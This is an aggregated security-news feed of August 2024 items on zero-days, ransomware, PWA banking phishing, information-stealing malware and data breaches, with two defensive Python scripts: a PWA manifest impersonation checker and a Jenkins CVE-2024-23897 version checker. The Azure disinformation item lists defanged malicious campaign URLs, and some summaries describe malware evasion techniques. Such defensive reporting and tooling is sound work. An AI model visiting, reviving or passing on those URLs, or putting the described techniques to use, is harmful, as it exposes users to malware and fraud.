Autosummary: After opening the URL delivered in the first stage, Android victims are presented with one of two campaigns: either a high-quality phishing page imitating the official Google Play store page for the targeted banking application, or a copycat website for that application. ESET analysts discovered a series of phishing campaigns targeting mobile users that used three different URL delivery mechanisms: calls, SMS, and malvertising.


          0-day in Windows driver exploited by North Korean hackers to deliver rootkit (CVE-2024-38193)

          exploits
          2024-08-20 https://www.helpnetsecurity.com/2024/08/20/0-day-in-windows-driver-exploited-by-north-korean-hackers-to-deliver-rootkit-cve-2024-38193/

CVE-2024-38193, an actively exploited zero-day that Microsoft patched earlier this month, has been leveraged by North Korean hackers to install a rootkit on targets’ computers, Gen Digital researchers have revealed. CVE-2024-38193 is a use-after-free vulnerability in the Windows Ancillary Function Driver for WinSock (AFD.sys). Gen Digital researchers Luigino Camastra and Milanek discovered in early June 2024 that the Lazarus APT group was exploiting the flaw to gain SYSTEM privileges, so they can “bypass …

Autosummary: The Lazarus group is well known for delivering rootkits to targets, either by taking advantage of zero-day vulnerabilities they found in Windows drivers that are installed by default, or by installing vulnerable third-party drivers and exploiting their 0-day or n-day flaws (the so-called “Bring Your Own Vulnerable Driver” technique).


          Hackers use PHP exploit to backdoor Windows systems with new malware

          exploits
          2024-08-20 https://www.bleepingcomputer.com/news/security/hackers-use-php-exploit-to-backdoor-windows-systems-with-new-malware/
Unknown attackers have deployed a newly discovered backdoor dubbed Msupedge on a university's Windows systems in Taiwan, likely by exploiting a recently patched PHP remote code execution vulnerability (CVE-2024-4577). [...]

Autosummary: On Friday, a day after the PHP maintainers released CVE-2024-4577 patches, watchTowr Labs released proof-of-concept (PoC) exploit code.


          August Windows updates break dual boot on some Linux systems

          Linux
          2024-08-20 https://www.bleepingcomputer.com/news/microsoft/august-windows-updates-break-dual-boot-on-some-linux-systems/
According to user reports following this month's Patch Tuesday, the August 2024 Windows updates are breaking dual boot on some Linux systems with Secure Boot enabled. [...]


          Why you need to know about ransomware

          exploits ransomware
          2024-08-20 https://www.malwarebytes.com/blog/ransomware/2024/08/why-you-need-to-know-about-ransomware
A home ransomware campaign sprung up amidst an increase in attacks against businesses, making the threat a must-know facet of cybersecurity.

Autosummary: The most important services in your life are also the most attractive targets for ransomware gangs around the world, which is why your banks, grocery stores, hospitals, schools, government resources, and more could, without any fault of your own, suddenly grind to a halt. For years, cybercriminals have focused their ransomware attacks on the types of organizations that are essential for everyday life, including hospitals, schools, critical infrastructure, and entire city governments. Because of past ransomware attacks, surgeries have been delayed, classes have been cancelled, and, more recently, a credit union’s customers had their direct deposit payments thrown into disarray.


          Ransomware payments rose from $449.1 million to $459.8 million

          exploits
          2024-08-20 https://securityaffairs.com/167305/malware/ransomware-payments-rose.html
Blockchain analysis firm Chainalysis revealed that ransomware payments rose by approximately 2%, from $449.1 million to $459.8 million, and that while overall on-chain illicit activity has decreased by nearly 20% year-to-date, stolen funds and ransomware significantly increased. Stolen funds inflows almost doubled, rising from $857 million to $1.58 billion, and ransomware […]


          CannonDesign confirms Avos Locker ransomware data breach

          financial exploits ransomware
          2024-08-20 https://www.bleepingcomputer.com/news/security/cannondesign-confirms-avos-locker-ransomware-data-breach/
The Cannon Corporation, dba CannonDesign, is sending notices of a data breach to more than 13,000 of its clients, informing them that hackers breached its network and stole data in an attack in early 2023. [...]

Autosummary: The data allegedly included database dumps, project schematics, hiring documents, client details, marketing material, IT and infrastructure details, and quality assurance reports.


          Microchip Technology discloses cyberattack impacting operations

          ciber
          2024-08-20 https://www.bleepingcomputer.com/news/security/microchip-technology-discloses-cyberattack-impacting-operations/
American chipmaker Microchip Technology Incorporated has disclosed that a cyberattack impacted its systems over the weekend, disrupting operations across multiple manufacturing facilities. [...]


          Czech Mobile Users Targeted in New Banking Credential Theft Scheme

          financial
          2024-08-20 https://thehackernews.com/2024/08/czech-mobile-users-targeted-in-new.html
Mobile users in the Czech Republic are the target of a novel phishing campaign that leverages a Progressive Web Application (PWA) in an attempt to steal their banking account credentials. The attacks have targeted the Czech-based Československá obchodní banka (CSOB), as well as the Hungarian OTP Bank and the Georgian TBC Bank, according to Slovak cybersecurity company ESET. "The phishing …

Autosummary: "The malware has various capabilities such as the collection of data about the infected device, exfiltration of banking credentials, collection of screen recordings, etc.," Broadcom-owned Symantec said.


          August Windows security update breaks dual boot on Linux systems

          Linux
          2024-08-20 https://www.bleepingcomputer.com/news/microsoft/august-windows-security-update-breaks-dual-boot-on-linux-systems/
According to user reports following this month's Patch Tuesday, the August 2024 Windows security updates are breaking dual boot on some Linux systems with Secure Boot enabled. [...]


          Be careful what you pwish for – Phishing in PWA applications

          financial
          2024-08-20 https://www.welivesecurity.com/en/eset-research/be-careful-what-you-pwish-for-phishing-in-pwa-applications/
ESET analysts dissect a novel phishing method tailored to Android and iOS users.

Autosummary: Depending on the campaign, clicking on the install/update button launches the installation of a malicious application from the website, directly on the victim’s phone, either in the form of a WebAPK (for Android users only) or as a PWA for iOS and Android users (if the campaign is not WebAPK based). After installation, the phishing PWA/WebAPK is added to the user’s home screen, and opening it leads to a phishing login page directly in the application. Installing a WebAPK does not produce any of the “installation from an untrusted source” warnings that users are commonly trained to look for. On top of all the previously mentioned hurdles for a regular user, the application’s info tab also states that the app was downloaded from the Google Play store, which is the default behavior. The application’s web app manifest is a standardized file that defines the logo, name, web application scope, sources, and service worker script of the application, as well as the launcher type. PWAs also have the advantage of a single codebase across multiple platforms, which now may also use modern browser APIs and even native code, thanks to WebAssembly. Even without that feature, access to browser APIs gives PWAs the right to request access to microphone, geolocation, camera, and all other supported browser functions, meaning that spyware PWAs could be on the radar. Upon inspection of the contacted C&C server, we uncovered an operator panel that included sensitive information of victims, currently active phishing URLs, and a full history of visiting victims. After opening the URL delivered in the first stage, Android victims are presented with a high-quality phishing page imitating the official Google Play store page for the targeted banking application, or a copycat website for the application. (Figures referenced: example of iOS installation, credit Michal Bláha; installed phishing WebAPK and PWA compared with the real banking app; WebAPK icon and the in-app phishing login page.)
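A brand-protection check for the manifest that drives the PWA/WebAPK install described here and in the two earlier items on the same ESET research (the Help Net Security and The Hacker News entries above). This is an added example, not ESET's code: it parses a web app manifest, looks for a monitored bank brand in its name, and flags the manifest when the host serving it is not one of that brand's domains, which is the situation a phishing kit is in when it wants the home-screen icon to read like the bank's app. The brand table, the allowed domains, the sample manifest and the URLs are all constructed.

```python
"""Score a web app manifest for banking-brand impersonation.

Added example for the PWA/WebAPK phishing technique described above; it is not
ESET's code. The brand list, the legitimate-domain list, the sample manifest
and the serving URLs are constructed for illustration.
"""
import json
import re
from urllib.parse import urlparse

# Assumed brand-protection data: lower-case brand token -> domains allowed
# to serve an installable app carrying that name.
BRAND_DOMAINS = {
    "csob": {"csob.cz"},
    "otp": {"otpbank.hu"},
    "tbc": {"tbcbank.ge"},
}

# Constructed manifest of the kind a phishing site would serve so that the
# installed PWA/WebAPK shows the bank's name and icon on the home screen.
SAMPLE_MANIFEST = json.dumps({
    "name": "CSOB Mobile Banking",
    "short_name": "CSOB",
    "start_url": "/app/",
    "scope": "/",
    "display": "standalone",
    "icons": [{"src": "/icons/bank-512.png", "sizes": "512x512", "type": "image/png"}],
})


def host_matches(host: str, domains: set) -> bool:
    """True when host equals one of the domains or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def detect_brand(manifest: dict):
    """Return the first monitored brand token found in name/short_name, else None."""
    text = f"{manifest.get('name', '')} {manifest.get('short_name', '')}".lower()
    tokens = set(re.findall(r"[a-z0-9]+", text))
    for brand in BRAND_DOMAINS:
        if brand in tokens:
            return brand
    return None


def assess_manifest(manifest_json: str, manifest_url: str) -> dict:
    """Classify a manifest fetched from manifest_url.

    Verdict is 'suspicious' only when a monitored brand appears in the app
    name and the serving host is outside that brand's domains; the display
    mode is reported as a supporting finding, not a verdict on its own.
    """
    manifest = json.loads(manifest_json)
    host = urlparse(manifest_url).hostname or ""
    brand = detect_brand(manifest)
    findings = []
    if manifest.get("display") in ("standalone", "fullscreen"):
        findings.append("installs as an app-like window without browser chrome")
    off_brand = brand is not None and not host_matches(host, BRAND_DOMAINS[brand])
    if off_brand:
        findings.append(f"uses brand '{brand}' but is served from {host}")
    return {
        "brand": brand,
        "host": host,
        "findings": findings,
        "verdict": "suspicious" if off_brand else "ok",
    }


if __name__ == "__main__":
    print(assess_manifest(SAMPLE_MANIFEST, "https://csob-app-update.example.net/manifest.json"))
```

Feed it the manifest URL you crawled, not the page URL, since the browser resolves the manifest relative to the document and `start_url` and `scope` are constrained to that origin. The brand token match is deliberately exact on whole tokens so that `otp` does not fire on every string containing those letters; extend the table with look-alike spellings and Unicode homoglyphs for brands you actually monitor.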


          Protecting academic assets: How higher education can enhance cybersecurity

          ciber
          2024-08-19 https://www.helpnetsecurity.com/2024/08/19/how-higher-education-can-enhance-cybersecurity-video/

Cyber attacks against higher education institutions increased by 70% in 2023. This is largely due to legacy endpoint security management and practices, limited IT support staff, and overwhelming amounts of data, much of which is PII (personally identifiable information). In this Help Net Security video, Doug Thompson, Chief Education Architect at Tanium, discusses how higher education institutions can defend against even the most sophisticated threats and vulnerabilities despite limited resources. Institutions must approach endpoint security management with …


          The Mad Liberator ransomware group uses social-engineering techniques

          exploits ransomware
          2024-08-19 https://securityaffairs.com/167231/malware/mad-liberator-ransomware-social-engineering.html
New cybercrime group Mad Liberator is targeting AnyDesk users and runs a fake Microsoft Windows update screen to conceal data exfiltration. The Sophos X-Ops Incident Response team warned that the new ransomware group is exploiting the remote-access application AnyDesk for its attacks. The group was also spotted running a fake Microsoft Windows update […]

Autosummary: “The attack lasted almost four hours, at the conclusion of which the attacker terminated the fake update screen and ended the AnyDesk session, giving control of the device back to the victim,” the researchers continue.


          To improve your cybersecurity posture, focus on the data

          ciber
          2024-08-19 https://www.helpnetsecurity.com/2024/08/19/security-data-fabric/

Effectively converging, managing and using enterprise data is a huge undertaking. Enterprises have vast hoards of data, but those hoards exist within siloed systems and applications, and it requires a lot of manual effort by highly skilled data scientists, engineers and analysts to extract value from all that data. Data preparation is a rudimentary and necessary task, but it prevents engineers from focusing their time on high-value tasks like identifying security gaps or storytelling …

Autosummary: This initiative requires that you:
Understand that it needs the right data feeds
Evaluate your data state
Identify data sources across the business
Understand how you can collect these datasets
Understand how to combine, normalize and transform this data for greater business context and insights
Build reporting on this layer and share it with stakeholders
One of the biggest struggles that security teams have is identifying which data sources are needed for full visibility into their security posture and how these sources can support various efforts, such as continuous controls monitoring or automated threat hunting. A security data fabric approach helps with transforming raw data into analysis-ready datasets, streamlining data analysis workflows, enabling data quality and integrity, and ultimately facilitating a stronger security posture. Once you’ve located the needed data sources and who’s in charge of them, and gotten their buy-in, the next step is figuring out how to get the data into your security data fabric platform.


          x64dbg: Open-source binary debugger for Windows

          exploits
          2024-08-19 https://www.helpnetsecurity.com/2024/08/19/x64dbg-open-source-binary-debugger-windows/

x64dbg is an open-source binary debugger for Windows, designed for malware analysis and reverse engineering of executables without access to the source code. It offers a wide range of features and a plugin system, allowing you to customize and extend its capabilities to suit your needs. “Probably the reason people like x64dbg is that it has a UI that makes it easy to jump around and automatically displays context for what’s happening in the process. …


          Microsoft Patches Zero-Day Flaw Exploited by North Korea’s Lazarus Group

          exploits
          2024-08-19 https://thehackernews.com/2024/08/microsoft-patches-zero-day-flaw.html
A newly patched security flaw in Microsoft Windows was exploited as a zero-day by Lazarus Group, a prolific state-sponsored actor affiliated with North Korea. The security vulnerability, tracked as CVE-2024-38193 (CVSS score: 7.8), has been described as a privilege escalation bug in the Windows Ancillary Function Driver (AFD.sys) for WinSock. "An attacker who successfully exploited this …


          Watch: Meghan speaks Spanish during Colombia trip

          latam
          2024-08-19 https://www.bbc.com/news/videos/cwy4xd9pxpgo
Prince Harry and his wife Meghan have been taking part in a series of events in Colombia.


          Xeon Sender Tool Exploits Cloud APIs for Large-Scale SMS Phishing Attacks

          financial exploits
          2024-08-19 https://thehackernews.com/2024/08/xeon-sender-tool-exploits-cloud-apis.html
Malicious actors are using a cloud attack tool named Xeon Sender to conduct SMS phishing and spam campaigns on a large scale by abusing legitimate services. "Attackers can use Xeon to send messages through multiple software-as-a-service (SaaS) providers using valid credentials for the service providers," SentinelOne security researcher Alex Delamotte said in a report shared with The Hacker News.

Autosummary: Examples of the services used to facilitate the en masse distribution of SMS messages include Amazon Simple Notification Service (SNS), Nexmo, Plivo, Proovl, Send99, Telesign, Telnyx, TextBelt, and Twilio.


          Experts warn of exploit attempt for Ivanti vTM bug

          exploits
          2024-08-19 https://securityaffairs.com/167250/hacking/exploit-attempt-ivanti-vtm-bug.html
Researchers at the Shadowserver Foundation observed an exploit attempt based on the public proof of concept (PoC) for the Ivanti vTM bug CVE-2024-7593. In mid-August, Ivanti addressed a critical authentication bypass vulnerability, tracked as CVE-2024-7593 (CVSS […]

Autosummary: “We are sharing Ivanti vTM devices exposed on the Internet in our Device ID report https://t.co/1uPaaDBQcc (no vulnerability assessment). Only 31 found 2024-08-17, but today we observed an exploit attempt based on the public PoC. Dashboard: https://t.co/9Q8PnD9DyT” (The Shadowserver Foundation, @Shadowserver, August 18, 2024)


          Microsoft Zero-Day CVE-2024-38193 was exploited by North Korea-linked Lazarus APT

          exploits
          2024-08-19 https://securityaffairs.com/167246/apt/microsoft-zero-day-cve-2024-38193-lazarus.html
Microsoft has addressed a zero-day vulnerability, tracked as CVE-2024-38193 (CVSS score: 7.8), which has been actively exploited by the North Korea-linked Lazarus APT group. The vulnerability is a privilege escalation issue that resides in the Windows Ancillary Function Driver (AFD.sys) for […]


          New UULoader Malware Distributes Gh0st RAT and Mimikatz in East Asia

          exploits
          2024-08-19 https://thehackernews.com/2024/08/new-uuloader-malware-distributes-gh0st.html
A new type of malware called UULoader is being used by threat actors to deliver next-stage payloads like Gh0st RAT and Mimikatz. The Cyberint Research Team, which discovered the malware, said it's distributed in the form of malicious installers for legitimate applications targeting Korean and Chinese speakers. There is evidence pointing to UULoader being the work of a Chinese speaker due to the …

Autosummary: Social engineering efforts have further cashed in on the popularity of the generative artificial intelligence (AI) wave to set up scam domains mimicking OpenAI ChatGPT to proliferate suspicious and malicious activity, including phishing, grayware, ransomware, and command-and-control (C2).


          Cybercriminals Exploit Popular Software Searches to Spread FakeBat Malware

          exploits ciber
          2024-08-19 https://thehackernews.com/2024/08/cybercriminals-exploit-popular-software.html
Cybersecurity researchers have uncovered a surge in malware infections stemming from malvertising campaigns distributing a loader called FakeBat. "These attacks are opportunistic in nature, targeting users seeking popular business software," the Mandiant Managed Defense team said in a technical report. "The infection utilizes a trojanized MSIX installer, which executes a PowerShell script to …


          CISA warns of Jenkins RCE bug exploited in ransomware attacks

          exploits ransomware
2024-08-19 https://www.bleepingcomputer.com/news/security/cisa-warns-of-jenkins-rce-bug-exploited-in-ransomware-attacks/
CISA has added a critical Jenkins vulnerability that can be exploited to gain remote code execution to its catalog of security bugs, warning that it's actively exploited in attacks. [...]


          Ransomware rakes in record-breaking $450 million in first half of 2024

          exploits
          2024-08-19 https://www.bleepingcomputer.com/news/security/ransomware-rakes-in-record-breaking-450-million-in-first-half-of-2024/
Ransomware victims have paid $459,800,000 to cybercriminals in the first half of 2024, setting the stage for a new record this year if ransom payments continue at this level. [...]

Autosummary: (Figure: ransom payment inflows, 2023 in orange and 2024 in blue. Source: Chainalysis.) Chainalysis says the number of confirmed ransomware attacks, according to eCrime.ch intelligence, has grown by 10% YoY in 2024, while a similar increase can be seen in the number of victims published on extortion portals on the dark web.


          CISA adds Jenkins Command Line Interface (CLI) bug to its Known Exploited Vulnerabilities catalog

          exploits
          2024-08-19 https://securityaffairs.com/167267/hacking/cisa-adds-jenkins-command-line-interface-cli-bug-to-its-known-exploited-vulnerabilities-catalog.html
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Jenkins Command Line Interface (CLI) path traversal vulnerability, tracked as CVE-2024-23897 (CVSS score of 9.8), to its Known Exploited Vulnerabilities (KEV) catalog. In January 2024, researchers […]

Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Jenkins Command Line Interface (CLI) Path Traversal vulnerability, tracked as CVE-2024-23897 (CVSS score of 9.8), to its Known Exploited Vulnerabilities (KEV) catalog.
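For the three CISA/Jenkins items above (this entry and the earlier ones from The Hacker News and BleepingComputer), the first thing a defender wants is an inventory check of which Jenkins servers still run a version affected by CVE-2024-23897. The following is an added example, not part of the CISA entry or of Jenkins itself: it reads the version Jenkins reports in its X-Jenkins response header and compares it with the fixed releases. The fix versions (weekly 2.442, LTS 2.426.3) are taken from the Jenkins security advisory for CVE-2024-23897; the raw HTTP response and the function names are constructed.

```python
"""Classify a Jenkins version string against the CVE-2024-23897 fix releases.

Added example; not Jenkins project code. The fixed releases are the ones named
in the Jenkins security advisory of 2024-01-24 for CVE-2024-23897.
"""
import re

# Weekly builds carry two version components (2.441), LTS builds three (2.426.2).
FIXED_WEEKLY = (2, 442)
FIXED_LTS = (2, 426, 3)

# Constructed sample of a raw HTTP response from a Jenkins login page.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html;charset=utf-8\r\n"
    "X-Jenkins: 2.426.2\r\n"
    "X-Jenkins-Session: 0123abcd\r\n"
    "\r\n"
    "<html>...</html>"
)


def parse_version(version: str) -> tuple:
    """Turn '2.426.2' or '2.441' into a comparable tuple of ints.

    Suffixes such as '-SNAPSHOT' are dropped; anything else raises ValueError.
    """
    core = version.strip().split("-", 1)[0]
    match = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?", core)
    if not match:
        raise ValueError(f"unrecognised Jenkins version: {version!r}")
    return tuple(int(part) for part in match.groups() if part is not None)


def is_vulnerable(version: str) -> bool:
    """True when the version predates the fix for its release line."""
    parts = parse_version(version)
    if len(parts) == 3:          # LTS line, e.g. 2.426.2
        return parts < FIXED_LTS
    return parts < FIXED_WEEKLY  # weekly line, e.g. 2.441


def version_from_response(raw: str):
    """Extract the X-Jenkins header value from a raw HTTP response, or None."""
    head = raw.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "x-jenkins":
            return value.strip()
    return None


def assess(raw_response: str) -> dict:
    """Summarise one host's exposure from its response headers.

    A missing header yields vulnerable=None: no verdict, not a clean bill.
    """
    version = version_from_response(raw_response)
    if version is None:
        return {"version": None, "line": None, "vulnerable": None}
    parts = parse_version(version)
    return {
        "version": version,
        "line": "LTS" if len(parts) == 3 else "weekly",
        "vulnerable": is_vulnerable(version),
    }


if __name__ == "__main__":
    print(assess(SAMPLE_RESPONSE))
```

An unpatched version is only part of the exposure: the CLI endpoint must also be reachable from the attacker's position, and how much of a file the flaw lets them read depends on whether anonymous users hold Overall/Read. Conversely, a reverse proxy that strips the header produces no verdict rather than a clean one, which is why the None result is kept distinct from False.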


          What did Prince Harry and Meghan’s Colombia trip achieve?

          latam
          2024-08-19 https://www.bbc.com/news/articles/c4gdkljn78ko
The couple's South America visit was an attempt to still show their influence on the world stage.

Autosummary: He added: “For as long as people are allowed to spread lies, abuse, harass, then social cohesion as we know it has completely broken down.” But as a result, some royal watchers did raise questions like: why do such a high-profile visit which seems, in part, about publicity too for both the hosts and the guests?


          Toyota confirms third-party data breach impacting customers

          financial
          2024-08-19 https://www.bleepingcomputer.com/news/security/toyota-confirms-third-party-data-breach-impacting-customers/
Toyota confirmed that customer data was exposed in a third-party data breach after a threat actor leaked an archive of 240GB of stolen data on a hacking forum. [...]

Autosummary: "Contents: Everything like Contacts, Finance, Customers, Schemes, Employees, Photos, DBs, Network infrastructure, Emails, and a lot of perfect data."


          SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 7

          exploits
          2024-08-18 https://securityaffairs.com/167213/malware/security-affairs-malware-newsletter-round-7.html
Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape.
Deciphering the Brain Cipher Ransomware
Ideal typosquat ‘solana-py’ steals your crypto wallet keys
Ransomware attackers introduce new EDR killer to their arsenal
Beyond the wail: deconstructing the BANSHEE infostealer
A Deep Dive into a New ValleyRAT […]


          ValleyRAT malware is targeting Chinese-speaking users

          exploits
          2024-08-17 https://securityaffairs.com/167164/cyber-crime/valleyrat-malware-targets-chinese-speaking-users.html
          FortiGuard Labs researchers uncovered an ongoing ValleyRAT malware campaign that is targeting Chinese-speaking users. ValleyRAT is a multi-stage malware that supports multiple techniques to monitor and control compromised devices. The malicious code is also used to deploy arbitrary plugins on the infected systems. A noteworthy characteristic of ValleyRAT malware is the heavy usage of shellcode […] "

Autosummary: The malicious code checks if it’s running in a virtual machine by enumerating all services and looking for VM-related strings like “VMWARE Tools,” “VMWare 共享,” “Virtual Machine,” and “VirtualBox Guest” in service display names. If any of these processes remain active, the malware injects shellcode with an embedded DLL into the lsass process, which grants it higher privileges, then also attempts to terminate AV processes, and modifies registry settings to disable or weaken the AV products’ autostart capabilities. "


          Azure domains and Google abused to spread disinformation and malware

          exploits
          2024-08-17 https://www.bleepingcomputer.com/news/security/azure-domains-and-google-abused-to-spread-disinformation-and-malware/
          A clever disinformation campaign engages several Microsoft Azure and OVH cloud subdomains as well as Google search to promote malware and spam sites. [...] "

Autosummary: Fake "Norton" virus-detected alerts (BleepingComputer) Fake "Adobe Flash Player" ad pushed by these domains (BleepingComputer) We observed many of these domains embedded ad-serving scripts like hxxps://moremashup[.]com/js/ads.js Some of these would go a step further and inject one-liner obfuscated scripts on the page, e.g. from hxxps://satisfactorymetalrub[.]com/8438b16ee31e72c66f3abda855a57488/invoke.js Obfuscated one-liner JavaScript injected by embedded scripts (BleepingComputer) Some of the URLs associated with this disinformation campaign identified by BleepingComputer are listed below: hxxps://cancerresearch.blob.core.windows[.]net/breakthrough/carol-burnett-stroke.html hxxps://celebradar.blob.core.windows[.]net/celebnetwork2/bill-paxton-wife-louise-newbury-death.html hxxps://applebulletin.blob.core.windows[.]net/bergenews5/is-randy-travis-dead.html hxxps://celebradar.blob.core.windows[.]net/celebnetwork15/tarrare-death-cause.html hxxps://newscentralstation.blob.core.windows[.]net/channel10/steve-harvey-accident.html hxxps://celebradar.blob.core.windows[.]net/celebnetwork13/who-is-tom-hardy-married-to.html hxxps://celebradar.blob.core.windows[.]net/celebnetwork15/mikayla-campinos-leakd.html hxxps://celebradar.blob.core.windows[.]net/celebnetwork5/sinbads-children.html hxxps://celebradar.blob.core.windows[.]net/celebnetwork12/was-kim-porter-mixed.html hxxps://celebradar.blob.core.windows[.]net/celebnetwork12/donnie-and-jenny-divorce-2024.html hxxps://sopnews.blob.core.windows[.]net/jazz8/michael-c-hall-height.html hxxps://celebradar.blob.core.windows[.]net/celebnetwork13/did-chris-change-his-name.html hxxps://flashnews2.s3.uk.io.cloud.ovh[.]net/harry-connick-jr-stroke.html hxxps://ashghali[.]com/automotive8/did-harry-connick-jr-have-a-stroke.html hxxps://globalinternationalnews.blob.core.windows[.]net/globalinternationalnews3/harry-connick-jr-stroke.html hxxps://interestnews.blob.core.windows[.]net/topictribune3/harry-connick-jr-stroke.html Readers should refrain from visiting search results pointing to the aforementioned URL structures, particularly when these appear to contain bold, unverified claims about public figures and entities which are otherwise not mentioned by credible sources. "


          National Public Data confirms a data breach

          financial
          2024-08-17 https://securityaffairs.com/167171/data-breach/national-public-data-confirms-data-breach.html
Background check service National Public Data confirms a data breach that exposed millions of social security numbers and other sensitive information. Background check service National Public Data confirms that a threat actor has breached its systems and had access to millions of social security numbers and other sensitive personal information. According to a statement published […] "

          Autosummary: Upon information and belief, such sensitive information includes, but is not limited to, Plaintiff’s and Class Members’ full names; current and past addresses (spanning at least the last three decades); Social Security numbers; information about parents, siblings, and other relatives (including some who have been deceased for nearly 20 years); and/or other personal information (collectively defined herein as “PII”).” “On April 8, a cybercriminal group by the name of USDoD posted a database entitled “National Public Data” on a dark web forum, claiming to have the personal data of 2.9 billion people, according to the complaint filed Thursday in the US District Court for the Southern District of Florida, which said the group put the database up for sale for $3.5 million.” reported Bloomberg law. "


          X suspends business in Brazil over censorship row

          latam
          2024-08-17 https://www.bbc.com/news/articles/cgjv857plevo
          The social media platform says its legal representative was threatened by a supreme court judge. "

          Autosummary: "


          All Blacks thrash Argentina to avenge first-Test loss

          latam
          2024-08-17 https://www.bbc.com/sport/rugby-union/articles/c5yk8kz1r71o
          New Zealand thrash Argentina 42-10 to avenge the defeat by the Pumas in their opening match of the 2024 Rugby Championship. "

          Autosummary: "


          Business and tech consolidation opens doors for cybercriminals

          ciber
          2024-08-16 https://www.helpnetsecurity.com/2024/08/16/technology-consolidation-risks/

          Cyber threats continued to intensify in the first half of 2024 as cybercriminals exploited security gaps from growing business and technological consolidation, according to Resilience. Consolidation in business and tech fuels new third-party risks Rebounding merger and acquisition (M&A) activity and increasing technology consolidation—in which industries rely on single suppliers for critical platform services—both created a staggering number of potential new points of failure for hackers to exploit. Global M&A deal volume increased 36% in … More

          The post Business and tech consolidation opens doors for cybercriminals appeared first on Help Net Security.

          "

          Autosummary: Of all claims received since January 2023, 35% were the result of a vendor data breach or ransom attack exploiting a third-party vendor—including notable vulnerabilities associated with Ivanti software—and in 2024 that number is already 40%, and expected to grow. "


          How NoCode and LowCode free up resources for cybersecurity

          ciber
          2024-08-16 https://www.helpnetsecurity.com/2024/08/16/nocode-lowcode-cybersecurity-video/

          In this Help Net Security video, Frederic Najman, Executive Member of the SFPN (French Union of NoCode Professionals), discusses how NoCode and LowCode technologies enable companies to free up development resources to tackle cybersecurity issues. In a context where three-quarters of CISOs report that their organization has faced an application security incident in the past two years, NoCode and LowCode tools offer new options to free up resources and find solutions to minimize risk.

          The post How NoCode and LowCode free up resources for cybersecurity appeared first on Help Net Security.

          "

          Autosummary: "


          Wanted Peru gang leader arrested in US

          latam
          2024-08-16 https://www.bbc.com/news/articles/c8xl8g84wqxo
Gianfranco Torres-Navarro is believed to be the leader of Los Killers gang and is on Peru's wanted list. "

          Autosummary: "


          Tech support scammers impersonate Google via malicious search ads

          financial
          2024-08-16 https://www.helpnetsecurity.com/2024/08/16/google-ads-support-scams/

          Google Search ads that target users looking for Google’s own services lead them to spoofed sites and Microsoft and Apple tech support scams. The fake Google Search ads (Source: Malwarebytes) “In this particular scheme, all web resources used from start to finish are provided by cloud providers, often free of charge. That means more flexibility for the criminals while increasing difficulty to block,” Malwarebytes researcher Jérôme Segura notes. Google ads leading to tech support scams … More

          The post Tech support scammers impersonate Google via malicious search ads appeared first on Help Net Security.

          "

          Autosummary: "


          Russian Hacker Jailed 3+ Years for Selling Stolen Credentials on Dark Web

          rusia-ucrania
          2024-08-16 https://thehackernews.com/2024/08/russian-hacker-jailed-3-years-for.html
          A 27-year-old Russian national has been sentenced to over three years in prison for peddling financial information, login credentials, and other personally identifying information (PII) on a now-defunct dark web marketplace called Slilpp. Georgy Kavzharadze, 27, of Moscow, Russia, pleaded guilty to one count of conspiracy to commit bank fraud and wire fraud earlier this February. In addition to "

          Autosummary: "


          Russian Hackers Using Fake Brand Sites to Spread DanaBot and StealC Malware

          exploits rusia-ucrania
          2024-08-16 https://thehackernews.com/2024/08/russian-hackers-using-fake-brand-sites.html
          Cybersecurity researchers have shed light on a sophisticated information stealer campaign that impersonates legitimate brands to distribute malware like DanaBot and StealC. The activity cluster, orchestrated by Russian-speaking cybercriminals and collectively codenamed Tusk, is said to encompass several sub-campaigns, leveraging the reputation of the platforms to trick users into downloading the "

          Autosummary: Cybersecurity researchers have shed light on a sophisticated information stealer campaign that impersonates legitimate brands to distribute malware like DanaBot and StealC. The activity cluster, orchestrated by Russian-speaking cybercriminals and collectively codenamed Tusk, is said to encompass several sub-campaigns, leveraging the reputation of the platforms to trick users into downloading the malware using bogus sites and social media accounts. "


          Multi-Stage ValleyRAT Targets Chinese Users with Advanced Tactics

          industry
          2024-08-16 https://thehackernews.com/2024/08/multi-stage-valleyrat-targets-chinese.html
          Chinese-speaking users are the target of an ongoing campaign that distributes malware known as ValleyRAT. "ValleyRAT is a multi-stage malware that utilizes diverse techniques to monitor and control its victims and deploy arbitrary plugins to cause further damage," Fortinet FortiGuard Labs researchers Eduardo Altares and Joie Salvio said. "Another noteworthy characteristic of this malware is its "

          Autosummary: The attack sequence is a multi-stage process that starts with a first-stage loader that impersonates legitimate applications like Microsoft Office to make them appear harmless (e.g., "工商年报大师.exe" or "补单对接更新记录txt.exe"). "


          Banshee Stealer, a new macOS malware with a monthly subscription price of $3,000

          exploits
          2024-08-16 https://securityaffairs.com/167138/malware/banshee-stealer-macos-malware.html
          Russian cybercriminals are advertising a new macOS malware called Banshee Stealer with a monthly subscription price of $3,000. In August 2024, Russian crooks advertised a macOS malware called BANSHEE Stealer that can target both x86_64 and ARM64 architectures. The malware authors claim it can steal a broad range of data from compromised systems, including browser […] "

          Autosummary: Banshee Stealer can target data from nine different browsers, Chrome, Firefox, Brave, Edge, Vivaldi, Yandex, Opera, OperaGX, and Safari. "


          CISA warns critical SolarWinds RCE bug is exploited in attacks

          exploits
          2024-08-16 https://www.bleepingcomputer.com/news/security/cisa-warns-critical-solarwinds-rce-bug-is-exploited-in-attacks/
CISA warned on Thursday that attackers are exploiting a recently patched critical vulnerability in SolarWinds' Web Help Desk solution for customer support. [...] "

          Autosummary: Web Help Desk (WHD) is IT help desk software widely used by large corporations, government agencies, and healthcare and education organizations worldwide to centralize, automate, and streamline help desk management tasks. "


          Attackers Exploit Public .env Files to Breach Cloud and Social Media Accounts

          exploits
          2024-08-16 https://thehackernews.com/2024/08/attackers-exploit-public-env-files-to.html
          A large-scale extortion campaign has compromised various organizations by taking advantage of publicly accessible environment variable files (.env) that contain credentials associated with cloud and social media applications. "Multiple security missteps were present in the course of this campaign, including the following: Exposing environment variables, using long-lived credentials, and absence "

